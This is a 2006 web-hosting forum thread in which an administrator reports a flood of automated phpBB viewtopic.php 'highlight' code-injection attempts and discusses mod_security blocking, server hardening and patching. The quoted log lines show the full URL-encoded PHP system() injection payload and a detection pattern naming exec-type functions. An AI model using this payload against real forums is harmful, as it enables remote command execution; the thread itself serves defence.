Php Exploit

system · May 9, 2006, 5:37pm

Hello,

Today we are under attack. Indeed One of our client use phpBB and we receive a lot of php exploit for this client/forum. It is a known exploit which use viewtopic.php and try to pass in some |exec| php command trough it (with highlight)

We have a mod_seucrity rule against this, so OK the attack is stopped but it is a HUGE attack which occurs every 2s from different hosts every time.

For example an snaphost log of this client

[Wed May 10 02:14:56 2006] [error] [client 64.38.26.202] mod_security: Access denied with code 403. Pattern match “(system|exec|passthru|cmd|fopen|exit|fwrite)” at THE_REQUEST [hostname “forum.titan-consortium.com”] [uri “/viewtopic.php?p=3041&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527”] [unique_id -lkWs0FuJIwAAG8uEScAAAAU]

[Wed May 10 02:15:21 2006] [error] [client 213.251.155.9] mod_security: Access denied with code 403. Pattern match “(system|exec|passthru|cmd|fopen|exit|fwrite)” at THE_REQUEST [hostname “forum.titan-consortium.com”] [uri “/viewtopic.php?t=348&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527”] [unique_id -9LxjkFuJIwAAFddEaQAAAAP]

[Wed May 10 02:15:25 2006] [error] [client 66.225.253.100] mod_security: Access denied with code 403. Pattern match “(system|exec|passthru|cmd|fopen|exit|fwrite)” at THE_REQUEST [hostname “forum.titan-consortium.com”] [uri “/viewtopic.php?t=598&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527”] [unique_id AA9@CEFuJIwAAF5uEUsAAAAR]

[Wed May 10 02:16:56 2006] [error] [client 66.249.137.42] mod_security: Access denied with code 403. Pattern match “(system|exec|passthru|cmd|fopen|exit|fwrite)” at THE_REQUEST [hostname “forum.titan-consortium.com”] [uri “/viewtopic.php?t=598&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527”] [unique_id BX0uEUFuJIwAAG8uESoAAAAU]

etc…

Our main pbm is mod_security causes segfault in httpd after few mn and httpd become unrespondive

So we stop mod_security. We not really afraid about the attack itself as in all our vhost we have a open_basedir directive, wget is chmoded to 700 and more our /tmp partition is noexec,nosuid so we think it should be OK, and it is…

Ok so now all the errors are in httpd/error.log telling wget can’t be executed (as we expected)

But there is still all these attacks, it’s like a DOS attack so we also suspended the account.

The attack continue anyway

in /home/*/var/domain/log/error we still have huge entries like this (every 2s)
[client 209.51.139.74] script ‘/home/interworx/var/disabled/viewtopic.php’ not found or unable to stat
[client 83.96.144.225] script ‘/home/interworx/var/disabled/viewtopic.php’ not found or unable to stat
[client 65.36.153.50] script ‘/home/interworx/var/disabled/viewtopic.php’ not found or unable to stat
[client 66.96.218.165] script ‘/home/interworx/var/disabled/viewtopic.php’ not found or unable to stat
[client 81.177.0.26] script ‘/home/interworx/var/disabled/viewtopic.php’ not found or unable to stat
[client 66.225.253.100] script ‘/home/interworx/var/disabled/viewtopic.php’ not found or unable to stat
[client 195.242.99.146] script ‘/home/interworx/var/disabled/viewtopic.php’ not found or unable to stat
[client 66.249.137.42] script ‘/home/interworx/var/disabled/viewtopic.php’ not found or unable to stat
[client 70.84.208.170] script ‘/home/interworx/var/disabled/viewtopic.php’ not found or unable to stat

As you might see the source IP is changing every time, so we can’t add the attacker in our firewall.

Do you have an idea on how we could stop this attack ? (we don’t have money to buy a high cost cisco router with anit DDOS :-p )

Thanks for your advises

Pascal

system · May 12, 2006, 4:11pm

I’m pretty sure I’ve seen similiar attempts on my box. A fair amount of attacks from The Planet datacenter.

system · May 12, 2006, 5:20pm

Well as it is bot there is nothing to do but install the last version of the script which have a security issue.

I found that suspend the siteworx accounts for few hours stop the attack. Like this it let us time to patch the script

Pascal